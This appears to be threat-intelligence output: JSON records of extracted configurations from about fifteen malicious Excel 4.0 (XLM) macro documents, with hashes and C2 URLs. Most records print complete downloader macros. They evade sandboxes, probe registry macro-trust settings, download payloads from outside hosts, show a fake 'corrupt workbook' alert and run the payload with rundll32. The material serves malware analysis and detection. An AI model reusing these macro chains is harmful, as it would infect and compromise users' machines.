{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a6247bd2762748f7de27c2239765eb4f32a45b62f5c557bf446cbce2c582ee8"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a6247bd2762748f7de27c2239765eb4f32a45b62f5c557bf446cbce2c582ee8","filesize":212992,"md5":"5cb60cdbf25b098e27f3d23628019b46","sha1":"f9759a541a1b62d42168a0700dbb1ad14ceeb6c9","sha256":"9a6247bd2762748f7de27c2239765eb4f32a45b62f5c557bf446cbce2c582ee8","sha512":"8be590582cba284394b111a8414920c8b94fb61d56b78142770e2856935da2da82095fed2db05e003ed179762f554bf252f8f0e589e3a3bc9cb2efa0949863a9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a6247bd2762748f7de27c2239765eb4f32a45b62f5c557bf446cbce2c582ee8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZvghQuUFdx\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a75c555fbfa23201ec0a08516aca3d23afdb43b3d36158f20a3b61e67327774"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a75c555fbfa23201ec0a08516aca3d23afdb43b3d36158f20a3b61e67327774","filesize":104448,"md5":"e6cc1b606149f86dba34e5e4317015a2","sha1":"07c4adc119582609308164b0a1f2c20b9a279bb3","sha256":"9a75c555fbfa23201ec0a08516aca3d23afdb43b3d36158f20a3b61e67327774","sha512":"1157ef0a1423c9b0870461691b768c0fcb4e9a8b39d58fa4192fa2a3d187ec87287723fb48dd71515545364ebb80a53dbc6342543fdaa3abc745f23db76d8a81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a75c555fbfa23201ec0a08516aca3d23afdb43b3d36158f20a3b61e67327774.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"kPc0TPt3ll\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a7c2dc20c6953882886007667b7c8715f83489c0899750e0444dfe94270bb7b"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a7c2dc20c6953882886007667b7c8715f83489c0899750e0444dfe94270bb7b","filesize":120320,"md5":"fcdf50a6c3b6f7f312e8a5602aa2827e","sha1":"89c961e892e4c4abdcde6d1fc92b2dd1a7901356","sha256":"9a7c2dc20c6953882886007667b7c8715f83489c0899750e0444dfe94270bb7b","sha512":"91e7a4e1c1e2868b2e0b8e0551895a827976a05f5a8f8a5978f4a607cfad52a698fb60e513185d89ae21a83f47fd93ef2103f5234c43d91ce23f6782968ae2b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a7c2dc20c6953882886007667b7c8715f83489c0899750e0444dfe94270bb7b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5RhgJIPCiJ\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a9206577159f1b1b0d283d1e2b281ae9b7cfc186c33b111fb69ba0828c88691"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a9206577159f1b1b0d283d1e2b281ae9b7cfc186c33b111fb69ba0828c88691","filesize":209408,"md5":"06412123a6fb522a60cdb4d73e2188c1","sha1":"cae8c34698a5eabd02d2f9e4cbe2bb05993015ab","sha256":"9a9206577159f1b1b0d283d1e2b281ae9b7cfc186c33b111fb69ba0828c88691","sha512":"2fa0daab95507730d35c58b1f336c3400094054097c96d54e3fc3747d98ccc50b25a46ddb9a7a817c544bb67f83b36e8c80d4b4e6be6b72322df009b0e0f3ce0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a9206577159f1b1b0d283d1e2b281ae9b7cfc186c33b111fb69ba0828c88691.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ap35UDkybc\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a947ca7f6234221e058caab4ced8106c25050a8c17f210738b4e6ed366c9bbc"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a947ca7f6234221e058caab4ced8106c25050a8c17f210738b4e6ed366c9bbc","filesize":221184,"md5":"ec7a6b14cffa797586c3de00f0d09f0a","sha1":"1c43ca0daf1851be5ee7e523f92166bbbe20ef34","sha256":"9a947ca7f6234221e058caab4ced8106c25050a8c17f210738b4e6ed366c9bbc","sha512":"c5a2ee40eb0b31259e9843e42d82b84cb60317ee4364b190e00d018bd9b631975d5224c2e573f651e831f882ee08b04a34d7e62bed09ed1f4cdea972e1e8ad65","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a947ca7f6234221e058caab4ced8106c25050a8c17f210738b4e6ed366c9bbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Odn6N3TP77\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ab41d7fce990a8506d89fadef30b0bc26697f552d2502a8bb55e69f60fe390d"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9ab41d7fce990a8506d89fadef30b0bc26697f552d2502a8bb55e69f60fe390d","filesize":185344,"md5":"29fed1fbf045c31c1b6999bf846caf19","sha1":"28cea6a7d0a35060995cfc49bcdc378b1584f1f9","sha256":"9ab41d7fce990a8506d89fadef30b0bc26697f552d2502a8bb55e69f60fe390d","sha512":"b63e4989226f5f38a113af85d7e25e5f5ab3d624be24bbf9e6abb339ec5bbc823f64197c4c9ce394cad8937603c3476e2f790742fee52864ee79efedd4581a03","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ab41d7fce990a8506d89fadef30b0bc26697f552d2502a8bb55e69f60fe390d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ab53637d3d56097fe2e004d607f30dacded512d9a451b75576b853a4dcbb4db"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9ab53637d3d56097fe2e004d607f30dacded512d9a451b75576b853a4dcbb4db","filesize":113664,"md5":"4c363b58fd014197e9e81b378ffc0c11","sha1":"48e5377beb89a3bf4aad5a7d81c763677321a4ec","sha256":"9ab53637d3d56097fe2e004d607f30dacded512d9a451b75576b853a4dcbb4db","sha512":"4388412a12637e90a9428c8d4b331c3f89f6dd32ce89786cb3c14937b2dd057af5aab46215a935346371492f5de16fe3e0ad89cdea84f5af512e4c5bfedfcce1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ab53637d3d56097fe2e004d607f30dacded512d9a451b75576b853a4dcbb4db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TxOgTGtRPX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9acd5786aed0abe8f130d4763aa6b4e7bbc0f230cf0c7601ee8c4c15a57e47a3"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9acd5786aed0abe8f130d4763aa6b4e7bbc0f230cf0c7601ee8c4c15a57e47a3","filesize":212992,"md5":"933cf87cbb76fa51278450d03304a64d","sha1":"ce645c47a1cdd22948deed7888054a4d1f9858f8","sha256":"9acd5786aed0abe8f130d4763aa6b4e7bbc0f230cf0c7601ee8c4c15a57e47a3","sha512":"14498205eb9f2187697c8d61c55bbbee7b70af5a3498bbb09839c0fa8418337546eb5fc89caa3b2632211c1a02d407610a4dbaf233a2ba73966938d0722decf8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9acd5786aed0abe8f130d4763aa6b4e7bbc0f230cf0c7601ee8c4c15a57e47a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lvRphi1GHN\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ad0db3a7cbc732553881b978a031a7e4bc651e0555cb1361654a36b1a127e70"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9ad0db3a7cbc732553881b978a031a7e4bc651e0555cb1361654a36b1a127e70","filesize":185344,"md5":"5ef7088805212ce610e7146e06a4382b","sha1":"f29c048c760a6b975b48d303f8e5d37cb778a945","sha256":"9ad0db3a7cbc732553881b978a031a7e4bc651e0555cb1361654a36b1a127e70","sha512":"c88a392ec8a83eb6c024d5dd2198e3ea5fdac0eee9242a36b13a36b2234aaaac23c637d8128f00113f0905f06fc9186eef0ae90360a8e7ca893a4a8e63e7dbe9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ad0db3a7cbc732553881b978a031a7e4bc651e0555cb1361654a36b1a127e70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ad853f5117bfe1dc5849e00f7ad615113e60ed94fb9208c407202c88b19733e"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9ad853f5117bfe1dc5849e00f7ad615113e60ed94fb9208c407202c88b19733e","filesize":185344,"md5":"38db0c547baac988ce7bce99ca4520d0","sha1":"72961a37e986856b24628d2713b3842a761b81ef","sha256":"9ad853f5117bfe1dc5849e00f7ad615113e60ed94fb9208c407202c88b19733e","sha512":"84487b8bd72f1a2716669086f44ef391e9c27cae23b20f0aa8d6b5a80c36311c0d4351f04db572726bc286155e6d6f328339bb8447c7b1bcf206dfdc4dcb0be9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ad853f5117bfe1dc5849e00f7ad615113e60ed94fb9208c407202c88b19733e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ae3af4cf1624a5e8bae2ab1ac4ba8fe562af40bb9b3946dfce78c96612d990b"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9ae3af4cf1624a5e8bae2ab1ac4ba8fe562af40bb9b3946dfce78c96612d990b","filesize":67584,"md5":"b4a4e0136d2c572371ca28c19f67f456","sha1":"e9ccc07fb11adf0600a56594cea68a09b6bac94f","sha256":"9ae3af4cf1624a5e8bae2ab1ac4ba8fe562af40bb9b3946dfce78c96612d990b","sha512":"fd1bd761a89a31eae71e6bbab92b50bdc70e7a30f13429ba7f5c3b810675bee79489c41240e28b20244eb03a0efda25fee8194bf0f019cde6e39d082f38c6e4e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ae3af4cf1624a5e8bae2ab1ac4ba8fe562af40bb9b3946dfce78c96612d990b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(SUM(2612.5,350,100,300,200,150,25,500,750,12.5),1098,\" \")\nSUM(2612.5,350,100,300,200,150,25,500,750,12.5)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9aec11ad77cf69c0694e426e4728ebb866703884d3096738b9bb4ae43eb4ddae"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9aec11ad77cf69c0694e426e4728ebb866703884d3096738b9bb4ae43eb4ddae","filesize":147968,"md5":"54ac11c12f2b3a82157915c3ddffdbd5","sha1":"33fef8f07749f1ddb0ad3f4278085e9c89ecec3b","sha256":"9aec11ad77cf69c0694e426e4728ebb866703884d3096738b9bb4ae43eb4ddae","sha512":"ea3200cc247d5697f8cb7e3e469de3fb92ada99ec69f92506836497eec34fa2800171f7ac97860a5768875ddbe5271e56c8a6f8fd8ba18d527405085e33e3714","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9aec11ad77cf69c0694e426e4728ebb866703884d3096738b9bb4ae43eb4ddae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"bvHb9SpMty\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9aec77bdf8e19b6dd51ff9b30087bd5f679722829ff204d54071c2d70d97eb92"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9aec77bdf8e19b6dd51ff9b30087bd5f679722829ff204d54071c2d70d97eb92","filesize":113664,"md5":"764f1636ec5d1a19ef60726deb57a528","sha1":"9981a761cab237e8b38635530aee5978c7170768","sha256":"9aec77bdf8e19b6dd51ff9b30087bd5f679722829ff204d54071c2d70d97eb92","sha512":"2ead2575d0f81e303fee7eded376253005ed9fba2cc1223036d1f2fd9eb7cc0442b5951c0ba0fe85990204732f06716d3f30d00e1c605349c838f2857fda1cd0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9aec77bdf8e19b6dd51ff9b30087bd5f679722829ff204d54071c2d70d97eb92.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zTjOkcB4YF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9af00ab70cecfb9beb9c845895c7107fb67bf26a0e1f6bd652d1e3c39faf525a"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9af00ab70cecfb9beb9c845895c7107fb67bf26a0e1f6bd652d1e3c39faf525a","filesize":206336,"md5":"e83a5ab8bc3a5ebbefe166fc6b27ac93","sha1":"f92b1b995b3fe0a7ce4fdbfb1292fbcd04796aed","sha256":"9af00ab70cecfb9beb9c845895c7107fb67bf26a0e1f6bd652d1e3c39faf525a","sha512":"6a1b7191acad31e0fb991a524f896c506b3b9ed8552f853f92dd126c19f4816e1ce8609f75b82395beb3cfbc989c8c57088fa52637bb5e06100a3e95cb7fbe51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9af00ab70cecfb9beb9c845895c7107fb67bf26a0e1f6bd652d1e3c39faf525a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gXqo3UlO4z\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9afab02598083d0c810f1012f2e174b000cef4b27332e9792f0966ecbbb1a1f8"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9afab02598083d0c810f1012f2e174b000cef4b27332e9792f0966ecbbb1a1f8","filesize":167936,"md5":"967decdf0e6c07b0912e2d41663a9509","sha1":"da065a2436d19cdde0306d7e119227c097636955","sha256":"9afab02598083d0c810f1012f2e174b000cef4b27332e9792f0966ecbbb1a1f8","sha512":"eda179d90a38653e83d0584a80eb5cfa0d67d9cc308102a18bca680627fecf2878fe37ac1531c86186309de612b0c917e1cc87324278ce8e964b859521230d73","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9afab02598083d0c810f1012f2e174b000cef4b27332e9792f0966ecbbb1a1f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gefddgdF64\",TRUE)\nGOTO(R$0C$19)"}}}]}
